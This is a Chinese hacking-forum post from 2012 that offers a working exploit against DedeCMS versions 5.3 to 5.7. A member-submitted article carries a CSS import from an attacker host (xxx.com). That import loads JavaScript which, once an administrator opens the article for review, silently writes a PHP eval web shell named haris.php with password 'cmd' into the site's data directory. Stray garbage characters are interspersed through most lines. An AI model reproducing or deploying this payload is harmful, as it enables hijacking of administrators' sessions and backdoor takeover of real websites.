找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1885|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell" y, s7 |; y& X6 `4 J
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)$ }# O3 Q& v. {" W$ v' i
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
4 O4 G7 s7 i& G8 Y" v5 h下面说说利用方法。
2 n, e. s- k2 i+ b. x9 X( V条件有2个:
+ u2 Q6 h9 Q) Z5 O1.开启注册1 ^) ^3 w+ I5 Q2 Q$ S
2.开启投稿3 Z1 ^# T9 P9 X# _3 Q# a7 [
注册会员----发表文章
7 Z5 U3 S* A7 j" s" R内容填写:' G6 Q1 X( j5 S  M6 S- |, M7 V
复制代码
9 p) Z* R5 ]; J; t6 p2 Z<style>@im\port'\http://xxx.com/xss.css';</style>$ b% i) s+ H6 T7 O, e# \
新建XSS.Css3 E0 o" J* b  N! j0 x6 V, u
复制代码. `$ w. h6 K% `: ~5 ~
.body{8 d& P& X. l! Z5 p3 ^+ H, o
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }9 S8 x# T* @( ^& E% o
新建xss.js 内容为8 p. e, u3 p) b! Z6 z
复制代码$ L/ f! g1 ^! u; m1 P7 z
1.var request = false;( B4 m6 r3 e/ Q( I0 m( Y7 W) W$ u7 y( L
2.if(window.XMLHttpRequest) {
$ F6 H( {5 Y. x* e3.request = new XMLHttpRequest();$ ]$ w1 p* C4 G* Q5 C6 C7 Q5 U8 O
4.if(request.overrideMimeType) {
: P2 K/ s3 t; u2 Z5 w: ^: q5.request.overrideMimeType('text/xml');
% E& h  x& g5 P; P% c$ p( S! u6.}
' s9 G' V  n* ]4 L# f, y7.} else if(window.ActiveXObject) {; d2 u' |2 C, B3 q$ D* r
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];7 w) r. L6 A* D
9.for(var i=0; i<versions.length; i++) {
) E/ L* o3 O  d+ A1 _10.try {2 }3 {- a. b, {* R9 L9 w- P  p
11.request = new ActiveXObject(versions);- p; v) W. F- `+ f; ~5 Z3 u) R8 a
12.} catch(e) {}  r8 C5 C4 k; W8 C, \
13.}: E8 ?2 `7 p2 N$ |3 w
14.}
. c2 A1 y7 d: z# w6 I$ g2 T15.xmlhttp=request;, }( |* i" E4 ]6 k
16.function getFolder( url ){
5 F+ B; F" U/ b; c$ {! S17. obj = url.split('/')8 H, Z2 S9 k) L) s( \/ Z" }2 ^% S8 ]
18. return obj[obj.length-2]7 m5 C# S1 d, S, r7 `: x
19.}
! z3 K8 v; q% l8 d20.oUrl = top.location.href;2 ?6 t- ]1 F' {) x+ W( `; @5 S
21.u = getFolder(oUrl);
0 m7 A8 w$ ]" N5 m22.add_admin();
$ i6 I6 [) J" c  u23.function add_admin(){' _+ E. S) p4 e7 J
24.var url= "/"+u+"/sys_sql_query.php";
4 k. r) D7 s  ^4 Q7 d0 g- w# o; Y/ F: ~25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";) G) ~+ P* \8 p/ a0 J1 g
26.xmlhttp.open("POST", url, true);: N" S5 A0 M' J3 W
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");( z1 w; s0 l( H: t. ~& ~
28.xmlhttp.setRequestHeader("Content-length", params.length);) N. L0 }6 m) e/ k( C" l
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
+ E9 e% J) l) W4 P  a% e7 D1 Z# m30.xmlhttp.send(params);* [' R2 t" F7 w1 W4 ~
31.}
: l6 u" t' U0 H" r- |% {当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表